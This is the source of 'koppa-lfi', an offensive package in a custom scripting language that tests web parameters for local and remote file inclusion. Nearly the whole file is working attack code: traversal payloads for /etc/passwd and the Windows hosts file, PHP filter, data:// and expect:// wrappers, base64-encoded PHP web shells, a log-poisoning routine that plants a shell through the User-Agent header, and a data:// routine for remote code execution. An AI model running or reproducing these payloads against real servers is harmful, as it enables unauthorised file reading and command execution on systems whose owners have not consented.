## koppa package: koppa-lfi
## version: 1.0.0
## description: LFI/RFI tester — path traversal, log poisoning, PHP wrapper, RCE via LFI
## author: KOPPA-OS
## tags: web, lfi, rfi, traversal, rce

import net, log, sys

let TRAVERSAL = [
    "../../../etc/passwd",
    "....//....//....//etc/passwd",
    "..%2F..%2F..%2Fetc%2Fpasswd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "....\\....\\....\\etc\\passwd",
    "/etc/passwd",
    "php://filter/convert.base64-encode/resource=/etc/passwd",
    "php://filter/read=string.rot13/resource=/etc/passwd",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
    "expect://id",
    "/proc/self/environ",
    "/var/log/apache2/access.log",
    "/var/log/nginx/access.log"
]

let WIN_TRAVERSAL = [
    "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "%WINDIR%\\system32\\drivers\\etc\\hosts"
]

fn scan(url, param) {
    log.info("[*] LFI scan: " + url + " ?" + param + "=...")
    let found = []
    for pay in TRAVERSAL {
        let resp = net.http_get(url + "?" + param + "=" + pay)
        if resp.body.contains("root:x:") or resp.body.contains("root:!:") {
            log.ok("[+] LFI confirmed!  Payload: " + pay)
            found.push(pay)
        }
        if resp.body.contains("<?php") or resp.body.contains("base64") {
            log.ok("[+] PHP wrapper response!")
            found.push(pay)
        }
    }
    for pay in WIN_TRAVERSAL {
        let resp = net.http_get(url + "?" + param + "=" + pay)
        if resp.body.contains("localhost") or resp.body.contains("127.0.0.1") {
            log.ok("[+] Windows LFI!  Payload: " + pay)
            found.push(pay)
        }
    }
    if found.len() == 0 { log.muted("[-] No LFI found") }
    return found
}

fn log_poison(url, param, lhost, cmd) {
    log.info("[*] Log poisoning via LFI...")
    let shell = "<?php system($_GET['cmd']); ?>"
    net.http_get(url, { "User-Agent": shell })
    log.ok("[+] Payload sent in User-Agent")
    let log_paths = ["/var/log/apache2/access.log", "/var/log/nginx/access.log"]
    for lp in log_paths {
        let resp = net.http_get(url + "?" + param + "=" + lp + "&cmd=" + net.url_encode(cmd))
        if resp.body.contains(cmd) or resp.status == 200 {
            log.ok("[+] RCE via log poison! Output:\n" + resp.body)
            return resp.body
        }
    }
    log.err("[-] Log poisoning failed")
    return ""
}

fn php_wrapper_rce(url, param) {
    log.info("[*] PHP data:// RCE attempt...")
    let shell_b64 = "PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8+"
    let pay  = "data://text/plain;base64," + shell_b64
    let resp = net.http_get(url + "?" + param + "=" + pay + "&cmd=id")
    if resp.body.contains("uid=") {
        log.ok("[+] RCE via PHP data://!\n" + resp.body)
        return true
    }
    log.muted("[-] data:// RCE failed")
    return false
}

fn main(args) {
    log.info("[koppa-lfi] LFI/RFI Tester v1.0")
    let url   = args[0] or sys.prompt("URL: ")
    let param = args[1] or sys.prompt("Parameter: ")
    let mode  = args[2] or "scan"
    if mode == "scan"    { scan(url, param) }
    if mode == "poison"  {
        let cmd = args[3] or "id"
        log_poison(url, param, "", cmd)
    }
    if mode == "rce"     { php_wrapper_rce(url, param) }
}
